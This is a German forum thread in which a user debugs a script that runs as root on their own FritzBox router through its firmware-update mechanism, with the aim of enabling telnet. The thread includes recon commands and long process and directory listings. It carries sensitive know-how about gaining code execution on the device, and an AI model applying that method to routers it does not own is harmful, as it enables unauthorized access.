Wenn ich raten sollte, würde ich auf einen falschen Aufruf des Skripts auf dem NAS-Speicher tippen ... das sollte eben explizit über "/bin/sh" erfolgen, weil ansonsten andere Probleme (angefangen bei den Dateirechten, wobei der NAS-Speicher zumindest mal nicht mit "noexec" gemountet wird, wenn ich das richtig sehe in der "S15-filesys") auftreten können. Habe ich aber oben auch so beschrieben ...

Oh, das war mir nicht so klar. Jetzt, wo du es schreibst, erklärt das natürlich die ganze Sache.
Als Command im Powershell-Script hatte ich immer:
Command: /var/media/ftp/invade.sh
Jetzt natürlich in
Command: /bin/sh /var/media/ftp/invade.sh
verändert... und es funktioniert...:D

Der Telnet-Zugang ist jedoch weiterhin nicht verfügbar. Es kommen bei PuTTY zwei Meldungen ein paar Sekunden nach dem versuchten Verbindungsaufbau: "Connection closed by remote host" und danach "Network error: Connection refused"

Ich wollte dann ein bisschen weiter debuggen und habe in dein invade.sh Script am Anfang und am Ende ein echo foo > /var/media/ftp/ok1.txt bzw. am Ende nach ok2.txt eingefügt. Nachdem dieses Script dann wieder ausgeführt wurde, habe ich per FTP gesehen, dass beide Dateien ok1.txt und ok2.txt angelegt wurden. Sie lassen sich jedoch per FTP nicht herunterladen. Auch per Fritz!NAS nicht.
Beim FTP-Client gibts ein "550 ok1.txt: No such file or directory", obwohl ein FTP Directory Listing das zeigt:
Code:
-rw-rw-rw- 1 ftp ftp 986 Jan  1 01:02 invade.sh
-rw-r--r-- 1 ftp ftp 4 Jan  1 01:02 ok1.txt
-rw-r--r-- 1 ftp ftp 4 Jan  1 01:02 ok2.txt

Gut, ich dachte, es liegt vielleicht an Unix-Dateirechten und habe dann eine neue Datei out.txt per FTP angelegt und in das invade.sh Script am Anfang ein echo "start" >> /var/media/ftp/out.txt und am Ende ein echo "stop" >> /var/media/ftp/out.txt notiert.

Logge ich mich nun per FTP auf die FritzBox, habe ich nun sogar zwei Dateien, die gleich heißen:
Code:
-rw-rw-rw- 1 ftp ftp 2 Jan  1 01:08 out.txt
-rw-r--r-- 1 ftp ftp 11 Jan  1 01:09 out.txt

Sehr merkwürdig.
Herunterladen kann ich nur die 2-Byte Datei, die ich per FTP erstellt habe. Die 11-Byte Datei mit "start/stop"-Inhalt (9 Byte + 2 Umbrüche vom Echo) lässt sich nicht angucken.

Per invade.sh Script ein rm /var/media/ftp/out.txt funktioniert jedoch wieder und die vom Script erstellte Datei ist weg, sodass nur noch meine per FTP händisch erstellte Datei out.txt übrig bleibt, die ich dann auch wieder per FTP löschen kann.

Kannst Du dieses Verhalten erklären?

...
Abgesehen davon lautete meine Empfehlung doch (iirc), daß Du die URL auf einen lokalen Server ändern solltest (anstelle von "fritz.box"), wo Du den HTTP-Request dann verfolgen kannst (mit einem Netzwerk-Mitschnitt oder anhand des Logs dieses Servers), oder? Was ist denn dabei herausgekommen? Es ist ja sinnvoller, das Problem systematisch einzugrenzen und nicht einfach irgendwie solange zu probieren, bis es (mehr oder weniger zufällig) dann mal klappt.
Richtig, hätte ich gemacht, sobald ich hier nicht weiterkomme. Das Debuggen mit Unix-Commands war nun für mich einfacher als das Sniffen von Traffic. Bin gerade umgezogen und habe meinen Linux-PC noch nicht ausgepackt.

- - - Aktualisiert - - -

Arg... Sorry... Windows-Zeilenumbrüche waren Schuld. Die Datei-Problematik hat sich nun erledigt. Teilweise hatten die Dateien noch ein Umbruch hinten dran... Deswegen wurden sie nicht gefunden... etc.

Langer Rede kurzer Sinn. Telnet klappt immernoch nicht. Aber zumindest kann ich nun weiter debuggen.
 
Tja, also es geht weiter... schleppend... bzw. leider erfolglos...
Inzwischen weiß ich, dass das invade-Script aufgerufen wird.
Leider ist Port 23 (und auch Port 514) nicht auf.
Ich habe dann die Möglichkeit genutzt, um ein paar weitere Details von der Fritzbox zu erfahren und zu gucken, woran es scheitert.

Am Ende des invade.sh Scripts habe ich dafür Folgendes angehängt:

Code:
ps > /var/media/ftp/test-ps.txt
ls -al /bin > /var/media/ftp/test-bin.txt
ls -al /var > /var/media/ftp/test-var.txt
ls -al /usr/bin > /var/media/ftp/test-usrbin.txt
ls -al /usr/sbin > /var/media/ftp/test-usrsbin.txt
netstat -an > /var/media/ftp/test-netstat.txt
cat /var/tmp/inetd.conf > /var/media/ftp/test-inetd.txt
cat /var/start_telnet > /var/media/ftp/test-start.txt
id > /var/media/ftp/test-id.txt
cat /proc/devices > /var/media/ftp/test-proc.txt
sed -ne 's|^[ ]*\([0-9]*\)[ \t]tffs.*$|\1|p' /proc/devices > /var/media/ftp/test-sed.txt

Ich verstehe nicht so wirklich, waum Du ein tar-Archiv auf dem node c 245 29 erzeugst...
Daher poste ich hier einfach mal die Outputs der o.g. Befehle.
Magst Du mal durchgucken und hast vielleicht ne Idee, woran es scheitert?
Bislang gibt es auf jeden Fall noch keinen /usr/sbin/telnetd Symlink und daher auch kein Port 23.

Dies sind die Outputs:

ps:
Code:
  PID USER       VSZ STAT COMMAND
    1 root      1524 S    init
    2 root         0 SW   [kthreadd]
    3 root         0 SW   [ksoftirqd/0]
    5 root         0 SW<  [kworker/0:0H]
    6 root         0 SW   [kworker/u8:0]
    7 root         0 SW   [migration/0]
    8 root         0 SW   [rcu_bh]
    9 root         0 SW   [rcu_sched]
   10 root         0 SW   [migration/2]
   11 root         0 SW   [ksoftirqd/2]
   13 root         0 SW<  [kworker/2:0H]
   15 root         0 SW   [kworker/0:1]
   18 root         0 SW   [kworker/2:1]
   19 root         0 SW<  [khelper]
   20 root         0 SW   [kdevtmpfs]
   21 root         0 SW   [kworker/u8:1]
  212 root         0 SW<  [writeback]
  214 root         0 SW<  [bioset]
  216 root         0 SW<  [kblockd]
  228 root         0 SW   [khubd]
  261 root         0 SW<  [rpciod]
  267 root         0 SW   [kswapd0]
  268 root         0 SW   [fsnotify_mark]
  269 root         0 SW<  [nfsiod]
  272 root         0 SW<  [xfsalloc]
  273 root         0 SW<  [xfs_mru_cache]
  274 root         0 SW<  [xfslogd]
  275 root         0 SW<  [crypto]
  306 root         0 SW   [pm_info]
  313 root         0 SWN  [avm_debugd]
  314 root         0 SW<  [ICCWQ0]
  315 root         0 SW<  [ICCWQ4]
  316 root         0 SW<  [ICCWQ2]
  427 root         0 SW   [tffsd]
  428 root         0 SW<  [deferwq]
  439 root         0 SW   [ubi_bgt0d]
  528 root         0 SW   [cleanup_timer_f]
  682 root         0 SW   [ubifs_bgt0_3]
  698 root         0 SW<  [capi_pipew]
  699 root         0 SW<  [capi_schedw]
  700 root         0 SW   [pcmlink_ctrl/0]
  701 root         0 SW<  [kworker/0:1H]
  702 root         0 SW   [capitransp]
  703 root         0 SW   [kworker/0:2]
  708 root         0 SW<  [avm_dect_thread]
  801 root      1168 S    /sbin/udevd --daemon
  823 root         0 SW   [ppa_rt_chk_hit_]
  850 root      1520 S    tail -f /nohup.out
 1013 root      1124 S    /sbin/udevd --daemon
 1307 root         0 SW<  [kworker/2:1H]
 1330 root      3364 S    avmipcd
 1584 root      4620 S    dsl_monitor -d
 1807 root      4108 S    l2tpv3d
 1817 root     19348 S    ctlmgr
 1831 root      5532 S    multid
 1890 root      3688 S    pcpd
 1894 root      4144 S    upnpdevd
 1904 root      7152 S    wland -B
 2002 root         0 SW<  [alloc_task_wque]
 2015 root      5524 S    dsld -i -n
 2106 root         0 SW   [kworker/2:2]
 2169 root      2124 S    /usr/bin/boxnotifyd
 2180 root      1532 S    sh /etc/init.d/rc.ovh_control.sh dynamic
 2193 root      1004 S    /bin/run_clock -c /dev/tffs -d
 2203 root      1524 S    init
 2228 root         0 SW<  [alloc_task_wque]
 2275 root      1168 S    /sbin/udevd --daemon
 2282 root      2020 S    hostapd -B -g /var/run/hostapd/global
 2288 root      2220 S    wpa_supplicant -B -g /var/run/wpa_supplicant/global
 2293 root      1600 S    /sbin/lbd
 2777 root      5816 S    {tr069fwupdate} $ fw http://fritz.box/jason_boxinfo.
 2851 root         0 SW   [kworker/0:0]
 2903 root      1512 S    sleep 10
 2968 root      1524 S    sh -c httpsdl -O - "http://fritz.box/jason_boxinfo.x
 2969 root      1524 S    sh -c httpsdl -O - "http://fritz.box/jason_boxinfo.x
 2970 root      5756 S    /usr/www/cgi-bin/firmwarecfg stream
 2971 root      1516 S    tar xvf -
 2972 root      1532 S    /bin/sh /var/media/ftp/invade.sh
 2984 root      1520 R    ps

/bin:
Code:
drwxr-xr-x    2 root     root          2546 Jan 25  2017 .
drwxr-xr-x   15 root     root           274 Jan 25  2017 ..
-rwxrwxrwx    1 root     root          7964 Jan 25  2017 aicmd
-rwxrwxrwx    1 root     root          9464 Jan 25  2017 allcfgconv
-rwxrwxrwx    1 root     root            42 Jan 25  2017 ar7cfgchanged
-rwxrwxrwx    1 root     root          9120 Jan 25  2017 ar7cfgctl
lrwxrwxrwx    1 root     root             7 Jan 25  2017 ash -> busybox
-rwxrwxrwx    1 root     root           344 Jan 25  2017 aurachanged
-r-xr-xr-x    1 root     root         11244 Jan 25  2017 auracntl
-r-xr-xr-x    1 root     root         37984 Jan 25  2017 aurad
-r-xr-xr-x    1 root     root        231520 Jan 25  2017 avmike
-rwxrwxrwx    1 root     root          5068 Jan 25  2017 avmipc_send_event
-rwxrwxrwx    1 root     root         17620 Jan 25  2017 avmipcd
-rwxrwxrwx    1 root     root         12284 Jan 25  2017 base64
-rwxrwxrwx    1 root     root         37644 Jan 25  2017 bntest
-rwxrwxrwx    1 root     root          2017 Jan 25  2017 boxfeaturedisable
-rwxrwxrwx    1 root     root        595568 Jan 25  2017 busybox
-rwxrwxrwx    1 root     root          2816 Jan 25  2017 captive_portal_upload_image
lrwxrwxrwx    1 root     root             7 Jan 25  2017 cat -> busybox
lrwxrwxrwx    1 root     root             7 Jan 25  2017 chgrp -> busybox
lrwxrwxrwx    1 root     root             7 Jan 25  2017 chmod -> busybox
lrwxrwxrwx    1 root     root             7 Jan 25  2017 chown -> busybox
-rwxrwxrwx    1 root     root        127812 Jan 25  2017 cjpeg
-r-xr-xr-x    1 root     root         12204 Jan 25  2017 configd
-rwxrwxrwx    1 root     root          6112 Jan 25  2017 conv2utf8
lrwxrwxrwx    1 root     root             7 Jan 25  2017 cp -> busybox
lrwxrwxrwx    1 root     root             7 Jan 25  2017 date -> busybox
lrwxrwxrwx    1 root     root             7 Jan 25  2017 dd -> busybox
lrwxrwxrwx    1 root     root             7 Jan 25  2017 df -> busybox
-rwxrwxrwx    1 root     root           265 Jan 25  2017 dhcpcipchanged
-rwxrwxrwx    1 root     root        143716 Jan 25  2017 djpeg
-rwxrwxrwx    1 root     root         52280 Jan 25  2017 dmesg
lrwxrwxrwx    1 root     root             7 Jan 25  2017 dnsdomainname -> busybox
-rwxrwxrwx    1 root     root           234 Jan 25  2017 dslinfodata
lrwxrwxrwx    1 root     root             7 Jan 25  2017 echo -> busybox
lrwxrwxrwx    1 root     root             7 Jan 25  2017 egrep -> busybox
lrwxrwxrwx    1 root     root             7 Jan 25  2017 false -> busybox
-rwxrwxrwx    1 root     root         29976 Jan 25  2017 ffmpegconv
lrwxrwxrwx    1 root     root             7 Jan 25  2017 fgrep -> busybox
-rwxrwxrwx    1 root     root           234 Jan 25  2017 fwupdate_logger
-rwxrwxrwx    1 root     root          4156 Jan 25  2017 getcons
lrwxrwxrwx    1 root     root             7 Jan 25  2017 getopt -> busybox
-rwxrwxrwx    1 root     root          5632 Jan 25  2017 getprivkeypass
-r-xr-xr-x    1 root     root         27148 Jan 25  2017 giftopam
lrwxrwxrwx    1 root     root             7 Jan 25  2017 grep -> busybox
lrwxrwxrwx    1 root     root             7 Jan 25  2017 gunzip -> busybox
lrwxrwxrwx    1 root     root             7 Jan 25  2017 gzip -> busybox
lrwxrwxrwx    1 root     root             7 Jan 25  2017 hostname -> busybox
-rwxrwxrwx    1 root     root          2741 Jan 25  2017 inetdctl
-rwxrwxrwx    1 root     root           643 Jan 25  2017 inetdftp
lrwxrwxrwx    1 root     root             7 Jan 25  2017 iostat -> busybox
-rwxrwxrwx    1 root     root         14904 Jan 25  2017 ipcs
lrwxrwxrwx    1 root     root             7 Jan 25  2017 kill -> busybox
-rwxrwxrwx    1 root     root         69948 Jan 25  2017 led-ctrl
lrwxrwxrwx    1 root     root             7 Jan 25  2017 ln -> busybox
lrwxrwxrwx    1 root     root             7 Jan 25  2017 login -> busybox
lrwxrwxrwx    1 root     root             7 Jan 25  2017 ls -> busybox
-rwxrwxrwx    1 root     root         10348 Jan 25  2017 luavar
lrwxrwxrwx    1 root     root             7 Jan 25  2017 mkdir -> busybox
lrwxrwxrwx    1 root     root             7 Jan 25  2017 mknod -> busybox
lrwxrwxrwx    1 root     root             7 Jan 25  2017 more -> busybox
lrwxrwxrwx    1 root     root             7 Jan 25  2017 mount -> busybox
lrwxrwxrwx    1 root     root             7 Jan 25  2017 mpstat -> busybox
-rwxrwxrwx    1 root     root          7528 Jan 25  2017 msgsend
lrwxrwxrwx    1 root     root             7 Jan 25  2017 mv -> busybox
lrwxrwxrwx    1 root     root             7 Jan 25  2017 netstat -> busybox
lrwxrwxrwx    1 root     root             7 Jan 25  2017 nice -> busybox
-rwxrwxrwx    1 root     root        135752 Jan 25  2017 ntfs-3g
-rwxrwxrwx    1 root     root           139 Jan 25  2017 onlinechanged
-rwxrwxrwx    1 root     root         47724 Jan 25  2017 openssl_genrsa
-rwxrwxrwx    1 root     root         71280 Jan 25  2017 openssl_req
-rwxrwxrwx    1 root     root          8796 Jan 25  2017 pcplisten
-rwxrwxrwx    1 root     root          8490 Jan 25  2017 picconv.sh
-rwxrwxrwx    1 root     root         49804 Jan 25  2017 pictured
lrwxrwxrwx    1 root     root             7 Jan 25  2017 pidof -> busybox
lrwxrwxrwx    1 root     root             7 Jan 25  2017 ping -> busybox
lrwxrwxrwx    1 root     root             7 Jan 25  2017 ping6 -> busybox
-rwxrwxrwx    1 root     root        145804 Jan 25  2017 playerd
-rwxrwxrwx    1 root     root          4680 Jan 25  2017 playerd_tables
-r-xr-xr-x    1 root     root         41496 Jan 25  2017 pngtopam
-rwxrwxrwx    1 root     root          8812 Jan 25  2017 pnmcomp
-rwxrwxrwx    1 root     root          8572 Jan 25  2017 pnmcut
-rwxrwxrwx    1 root     root         21636 Jan 25  2017 pnmscale
-rwxrwxrwx    1 root     root          6392 Jan 25  2017 prepare_fwupgrade
lrwxrwxrwx    1 root     root             7 Jan 25  2017 printenv -> busybox
lrwxrwxrwx    1 root     root             7 Jan 25  2017 ps -> busybox
lrwxrwxrwx    1 root     root             7 Jan 25  2017 pwd -> busybox
-rwxrwxrwx    1 root     root          7896 Jan 25  2017 rdjpgcom
-rwxrwxrwx    1 root     root          3337 Jan 25  2017 restorefonsettings
lrwxrwxrwx    1 root     root             7 Jan 25  2017 rm -> busybox
lrwxrwxrwx    1 root     root             7 Jan 25  2017 rmdir -> busybox
-r-xr-xr-x    1 root     root         11364 Jan 25  2017 rpctrl
-rwxrwxrwx    1 root     root         12332 Jan 25  2017 run_clock
lrwxrwxrwx    1 root     root             7 Jan 25  2017 sed -> busybox
-rwxrwxrwx    1 root     root          2972 Jan 25  2017 setfactorydefaults
lrwxrwxrwx    1 root     root             7 Jan 25  2017 setserial -> busybox
-rwxrwxrwx    1 root     root          5084 Jan 25  2017 setsystz
lrwxrwxrwx    1 root     root             7 Jan 25  2017 sh -> busybox
-rwxrwxrwx    1 root     root         45000 Jan 25  2017 showdsldstat
-rwxrwxrwx    1 root     root         25240 Jan 25  2017 showfritznasdbstat
-rwxrwxrwx    1 root     root          8648 Jan 25  2017 showinetstat
-rwxrwxrwx    1 root     root         10488 Jan 25  2017 showl2tpstat
-rwxrwxrwx    1 root     root          6772 Jan 25  2017 showopenports
-rwxrwxrwx    1 root     root         15172 Jan 25  2017 showpainfo
-rwxrwxrwx    1 root     root          1734 Jan 25  2017 showpcpinfo
-rwxrwxrwx    1 root     root         11492 Jan 25  2017 showpcpitems
-rwxrwxrwx    1 root     root          5428 Jan 25  2017 showshringbuf
-rwxrwxrwx    1 root     root         19972 Jan 25  2017 showvoipdstat
-rwxrwxrwx    1 root     root         11228 Jan 25  2017 slabparse
lrwxrwxrwx    1 root     root             7 Jan 25  2017 sleep -> busybox
lrwxrwxrwx    1 root     root             7 Jan 25  2017 stat -> busybox
lrwxrwxrwx    1 root     root             7 Jan 25  2017 stty -> busybox
-rwxrwxrwx    1 root     root         34252 Jan 25  2017 supportdata
-rwxrwxrwx    1 root     root           371 Jan 25  2017 supportdata.aha
-rwxrwxrwx    1 root     root          2062 Jan 25  2017 supportdata.argo
-rwxrwxrwx    1 root     root           471 Jan 25  2017 supportdata.avmnet
-rwxrwxrwx    1 root     root           408 Jan 25  2017 supportdata.basis
-r-xr-xr-x    1 root     root          1163 Jan 25  2017 supportdata.dect
-rwxrwxrwx    1 root     root          4203 Jan 25  2017 supportdata.dsl
-rwxrwx---    1 root     root          2904 Jan 25  2017 supportdata.plc
-rwxrwxrwx    1 root     root          1341 Jan 25  2017 supportdata.tffs
-rwxrwxrwx    1 root     root           997 Jan 25  2017 supportdata.usb
-r-xr-xr-x    1 root     root          6828 Jan 25  2017 supportdata.wlan
lrwxrwxrwx    1 root     root            20 Jan 25  2017 supportdata_argo.dsl -> /bin/supportdata.dsl
-rwxrwx---    1 root     root          3667 Jan 25  2017 supportdata_argo.plc
-rwxrwxrwx    1 root     root           673 Jan 25  2017 supportdata_argo.usb
-r-xr-xr-x    1 root     root          2655 Jan 25  2017 supportdata_argo.wlan
lrwxrwxrwx    1 root     root             7 Jan 25  2017 sync -> busybox
lrwxrwxrwx    1 root     root             7 Jan 25  2017 tar -> busybox
-rwxrwxrwx    1 root     root          5628 Jan 25  2017 tcppeerlocation
-rwxrwxrwx    1 root     root          5024 Jan 25  2017 testvalue
lrwxrwxrwx    1 root     root             7 Jan 25  2017 touch -> busybox
-rwxrwxrwx    1 root     root         14776 Jan 25  2017 tr069starter
lrwxrwxrwx    1 root     root             7 Jan 25  2017 true -> busybox
lrwxrwxrwx    1 root     root             7 Jan 25  2017 umount -> busybox
lrwxrwxrwx    1 root     root             7 Jan 25  2017 uname -> busybox
-rwxrwxrwx    1 root     root            93 Jan 25  2017 update_led_off
-rwxrwxrwx    1 root     root            91 Jan 25  2017 update_led_on
-rwxrwxrwx    1 root     root          6844 Jan 25  2017 usbcfgconv
-rwxrwxrwx    1 root     root         10368 Jan 25  2017 usbcfgctl
-rwxrwxrwx    1 root     root           373 Jan 25  2017 usbhostchanged
lrwxrwxrwx    1 root     root             9 Jan 25  2017 usermand -> usermand2
-r-xr-xr-x    1 root     root         49600 Jan 25  2017 usermand2
lrwxrwxrwx    1 root     root             7 Jan 25  2017 vi -> busybox
-rwxrwxrwx    1 root     root           208 Jan 25  2017 voipcfgchanged
-rwxrwxrwx    1 root     root        186356 Jan 25  2017 voipd
-rwxrwxrwx    1 root     root          5972 Jan 25  2017 webdavcfginfo
-rwxrwxrwx    1 root     root           818 Jan 25  2017 wlancfgchanged
-rwxrwxrwx    1 root     root         12786 Jan 25  2017 wlancfgconv
-rwxrwxrwx    1 root     root         15547 Jan 25  2017 wlancfgctl
-rwxrwxrwx    1 root     root          3632 Jan 25  2017 wlantimectrl
lrwxrwxrwx    1 root     root             7 Jan 25  2017 zcat -> busybox

/var:
Code:
drwxr-xr-x   14 root     root          1740 Jan  1 01:07 .
drwxr-xr-x   15 root     root           274 Jan 25  2017 ..
-rw-r--r--    1 root     root           404 Jan  1 01:00 .CRWWLANMAP
-rw-r--r--    1 root     root          3720 Jan  1 01:00 .SHMUSBDEVICES
-rw-rw-r--    1 root     root         40000 Jan  1 01:06 .ar7events
-rw-r--r--    1 root     root        180080 Jan  1 01:00 .dsld_statsimple
-rw-r--r--    1 root     root            53 Jan  1 01:00 .igdd-del-portmap
-rw-r--r--    1 root     root           216 Jan  1 01:00 .inetstat
-rw-r--r--    1 root     root          8192 Jan  1 01:00 .srb_avm_reporting
-rw-r--r--    1 root     root         12288 Jan  1 01:00 .srb_cloudmsgd
-rw-r--r--    1 root     root          4096 Jan  1 01:00 .srb_dnsd
-rw-r--r--    1 root     root         16384 Jan  1 01:00 .srb_invite
-rw-r--r--    1 root     root          8192 Jan  1 01:00 .srb_l2tpv3
-rw-r--r--    1 root     root         65536 Jan  1 01:00 .srb_log
-rw-r--r--    1 root     root          8192 Jan  1 01:00 .srb_pcp
-rw-r--r--    1 root     root         16384 Jan  1 01:00 .srb_sip
-rw-r--r--    1 root     root         65536 Jan  1 01:07 .srb_sson
-rw-r--r--    1 root     root          4096 Jan  1 01:00 .srb_voipbackup
-rw-r--r--    1 root     root           108 Jan  1 01:00 .umtscfg
-rw-r--r--    1 root     root          2836 Jan  1 01:00 .umtsstat
-rw-r--r--    1 root     root            32 Jan  1 01:00 .var.tmp.cloudcds.log-crwlock
-rw-r--r--    1 root     root            32 Jan  1 01:00 .var.tmp.msrv4.log-crwlock
-rw-r--r--    1 root     root            32 Jan  1 01:00 .var.tmp.tcloud.log-crwlock
-rw-r--r--    1 root     root        212380 Jan  1 01:00 .voipd_statsimple
-rw-r--r--    1 root     root            32 Jan  1 01:00 CRWWLANMAP-crwlock
lrwxrwxrwx    1 root     root            14 Jan  1 01:00 InternerSpeicher -> /var/media/ftp
-rw-r--r--    1 root     root            32 Jan  1 01:00 SHMUSBDEVICES-crwlock
lrwxrwxrwx    1 root     root            19 Jan  1 01:00 TZ -> /etc/default.049/TZ
-rw-r--r--    1 root     root             1 Jan  1 01:00 USB-dev-bus-usb-001-001-hub
-rw-r--r--    1 root     root             1 Jan  1 01:00 USB-dev-bus-usb-002-001-hub
-rw-r--r--    1 root     root             1 Jan  1 01:00 USB-dev-bus-usb-003-001-hub
-rw-r--r--    1 root     root             1 Jan  1 01:00 USB-dev-bus-usb-004-001-hub
-rw-r--r--    1 root     root          6118 Jan  1 01:00 config.def
lrwxrwxrwx    1 root     root            28 Jan  1 01:00 default -> /etc/default.Fritz_Box_HW225
drwxr-xr-x    2 root     root            40 Jan 25  2017 dev
lrwxrwxrwx    1 root     root            19 Jan  1 01:00 devices -> /var/tmp/usbdevices
drwxr-xr-x    6 root     root           240 Jan  1 01:00 dsl
-rw-r--r--    1 root     root            32 Jan  1 01:00 dsld_statsimple-crwlock
-rw-r--r--    1 root     root           887 Jan  1 01:00 env
-rw-r--r--    1 root     root          9790 Jan  1 01:00 env.cache
drwxr-xr-x    2 root     root          1000 Jan  1 01:00 flash
lrwxrwxrwx    1 root     root            31 Jan  1 01:00 flash.html -> /var/html/html/tools/flash.html
lrwxrwxrwx    1 root     root            31 Jan  1 01:00 fx_moh -> /etc/default.049/fx_moh.default
drwxr-xr-x    2 root     root            40 Jan  1 01:00 gcov
lrwxrwxrwx    1 root     root            12 Jan  1 01:00 html -> /usr/www/avm
lrwxrwxrwx    1 root     root            20 Jan  1 01:00 html.myfritz -> /usr/www.myfritz/avm
lrwxrwxrwx    1 root     root            16 Jan  1 01:00 html.nas -> /usr/www.nas/avm
lrwxrwxrwx    1 root     root            19 Jan  1 01:00 htmltext.db -> /etc/htmltext_de.db
-rw-r--r--    1 root     root            32 Jan  1 01:00 igdd-del-portmap-crwlock
-rw-r--r--    1 root     root            32 Jan  1 01:00 inetstat-crwlock
-rw-r--r--    1 root     root           381 Jan  1 01:00 jason_boxinfo.xml
-rw-r--r--    1 root     root           500 Jan  1 01:00 juis_boxinfo.xml
-rw-r--r--    1 root     root             9 Jan  1 01:00 lanifaces
-rw-r--r--    1 root     root             4 Jan  1 01:07 led
drwxr-xr-x    2 root     root            60 Jan  1 01:00 lock
drwxr-xr-x    2 root     root           160 Jan  1 01:00 log
drwxr-xr-x    3 root     root            80 Jan  1 01:00 media
lrwxrwxrwx    1 root     root            15 Jan  1 01:00 mediapath -> /var/media/ftp/
-rw-r--r--    1 root     root            15 Jan  1 01:00 mountpoint_excluded_for_network
-rwxrwxrwx    1 root     root          9222 Jan 25  2017 post_install
drwxr-xr-x    2 root     root            80 Jan  1 01:07 rpc
drwxr-xr-x    4 root     root           360 Jan  1 01:07 run
-rw-r--r--    1 root     root            16 Jan  1 01:00 sem..SHMUSBDEVICES
-rw-rw-r--    1 root     root            16 Jan  1 01:00 sem..ar7events
-rw-r--r--    1 root     root            16 Jan  1 01:00 sem..igdd-del-portmap
-rw-r--r--    1 root     root            16 Jan  1 01:00 sem..inetstat
-rw-r--r--    1 root     root            16 Jan  1 01:00 sem..srb_avm_reporting
-rw-r--r--    1 root     root            16 Jan  1 01:00 sem..srb_dnsd
-rw-r--r--    1 root     root            16 Jan  1 01:00 sem..srb_l2tpv3
-rw-r--r--    1 root     root            16 Jan  1 01:00 sem..srb_log
-rw-r--r--    1 root     root            16 Jan  1 01:00 sem..srb_pcp
-rw-r--r--    1 root     root            16 Jan  1 01:07 sem..srb_sson
-rw-r--r--    1 root     root            16 Jan  1 01:00 sem..srb_voipbackup
-rw-r--r--    1 root     root            16 Jan  1 01:00 sem..umtscfg
-rw-r--r--    1 root     root            16 Jan  1 01:00 sem..umtsstat
-rw-r--r--    1 root     root            16 Jan  1 01:00 sem.Changelist_Sema
-rw-r--r--    1 root     root            16 Jan  1 01:00 sem.notifyd
-rw-r--r--    1 root     root            16 Jan  1 01:00 sem.ontel
-rw-r--r--    1 root     root            29 Jan  1 01:00 signal.EXIT
-rw-r--r--    1 root     root           414 Jan  1 01:07 start_telnet
drwxr-xr-x    2 root     root            60 Jan  1 01:07 tam
drwxrwxrwx    5 root     root          1700 Jan  1 01:07 tmp
-rw-r--r--    1 root     root            32 Jan  1 01:00 umtscfg-crwlock
-rw-r--r--    1 root     root            32 Jan  1 01:00 umtsstat-crwlock
-rw-r--r--    1 root     root            32 Jan  1 01:00 voipd_statsimple-crwlock
lrwxrwxrwx    1 root     root            16 Jan  1 01:00 web_activity -> run/cpufreq.kick
drwxr-xr-x    2 root     root            40 Jan 25  2017 wpa2

/usr/bin:
Code:
drwxr-xr-x    2 root     root          1595 Jan 25  2017 .
drwxr-xr-x   10 root     root           166 Jan 25  2017 ..
-rwxrwxrwx    1 root     root          6020 Jan 25  2017 access_check
-rwxrwxrwx    1 root     root        301552 Jan 25  2017 aha
-rwxrwxrwx    1 root     root         40860 Jan 25  2017 ahamailer
-rwxrwxrwx    1 root     root         87988 Jan 25  2017 audiod
lrwxrwxrwx    1 root     root            17 Jan 25  2017 basename -> ../../bin/busybox
-rwxrwxrwx    1 root     root         16416 Jan 25  2017 boxnotifyd
-rwxrwxrwx    1 root     root         60408 Jan 25  2017 bspatch
lrwxrwxrwx    1 root     root            17 Jan 25  2017 bunzip2 -> ../../bin/busybox
lrwxrwxrwx    1 root     root            17 Jan 25  2017 bzcat -> ../../bin/busybox
lrwxrwxrwx    1 root     root            17 Jan 25  2017 bzip2 -> ../../bin/busybox
-rwxrwxrwx    1 root     root         16748 Jan 25  2017 capiotcp_server
-rwxrwxrwx    1 root     root          4008 Jan 25  2017 checkempty
-rwxrwxrwx    1 root     root            74 Jan 25  2017 checkperformance
lrwxrwxrwx    1 root     root             3 Jan 25  2017 classcfg -> cli
-rwxrwxrwx    1 root     root         78332 Jan 25  2017 cli
lrwxrwxrwx    1 root     root            17 Jan 25  2017 cmp -> ../../bin/busybox
-r-xr-xr-x    1 root     root         53504 Jan 25  2017 csvd
-rwxrwxrwx    1 root     root         61196 Jan 25  2017 ctlmgr
-rwxrwxrwx    1 root     root         12440 Jan 25  2017 ctlmgr_ctl
lrwxrwxrwx    1 root     root            17 Jan 25  2017 cut -> ../../bin/busybox
-rwxrwxrwx    1 root     root          5863 Jan 25  2017 dect_bg_image_conversion.sh
-rwxrwxrwx    1 root     root         10917 Jan 25  2017 dect_doorline_image_conversion.sh
-rwxrwxrwx    1 root     root       1227988 Jan 25  2017 dect_manager
-rwxrwxrwx    1 root     root          4688 Jan 25  2017 dect_ringtone_conversion.sh
-rwxrwxrwx    1 root     root         14624 Jan 25  2017 dhrystone
lrwxrwxrwx    1 root     root            17 Jan 25  2017 dirname -> ../../bin/busybox
-rwxrwxrwx    1 root     root           542 Jan 25  2017 docsis_lifetest.sh
-rwxrwxrwx    1 root     root        198460 Jan 25  2017 dtrace
lrwxrwxrwx    1 root     root            17 Jan 25  2017 du -> ../../bin/busybox
lrwxrwxrwx    1 root     root            17 Jan 25  2017 env -> ../../bin/busybox
-rwxrwxrwx    1 root     root         45244 Jan 25  2017 envsubst
lrwxrwxrwx    1 root     root            17 Jan 25  2017 expr -> ../../bin/busybox
-rwxrwxrwx    1 root     root         41928 Jan 25  2017 faxd
-rwxrwxrwx    1 root     root           531 Jan 25  2017 finalize.sh
lrwxrwxrwx    1 root     root            17 Jan 25  2017 find -> ../../bin/busybox
lrwxrwxrwx    1 root     root            17 Jan 25  2017 free -> ../../bin/busybox
lrwxrwxrwx    1 root     root            17 Jan 25  2017 ftpget -> ../../bin/busybox
lrwxrwxrwx    1 root     root            17 Jan 25  2017 ftpput -> ../../bin/busybox
-rwxrwxrwx    1 root     root         37816 Jan 25  2017 gcalupd
-rwxrwxrwx    1 root     root         16740 Jan 25  2017 httpsdl
lrwxrwxrwx    1 root     root            17 Jan 25  2017 id -> ../../bin/busybox
lrwxrwxrwx    1 root     root             3 Jan 25  2017 ifcfg -> cli
lrwxrwxrwx    1 root     root            17 Jan 25  2017 killall -> ../../bin/busybox
-rwxrwxrwx    1 root     root           542 Jan 25  2017 library.sh
lrwxrwxrwx    1 root     root            17 Jan 25  2017 logname -> ../../bin/busybox
-rwxrwxrwx    1 root     root           542 Jan 25  2017 lte_lifetest.sh
lrwxrwxrwx    1 root     root            17 Jan 25  2017 md5sum -> ../../bin/busybox
-rwxrwxrwx    1 root     root           136 Jan 25  2017 mkconfigfile
lrwxrwxrwx    1 root     root            17 Jan 25  2017 mkfifo -> ../../bin/busybox
